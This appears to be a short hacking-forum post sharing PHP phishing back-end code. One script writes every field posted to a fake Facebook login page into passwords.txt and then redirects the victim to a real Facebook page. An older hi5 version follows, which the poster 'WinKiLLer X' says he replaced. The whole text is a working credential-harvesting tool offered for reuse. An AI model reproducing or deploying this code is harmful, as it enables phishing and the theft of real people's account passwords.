$yourpagesource = “http://login.facebook.com”;
$handle = fopen(”passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable.”=”.$value);
}
fwrite($handle, “\r\n”);
fclose($handle);
header(’Location: http://facebook.com/terms.php’);
exit;
?>
This new php code was added by me: WinKiLLer X
This was the old code that was on, http://messblack.com:
Code:
header (’Location: http://www.hi5.com/friend/login.do ‘);
$handle = fopen(”passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>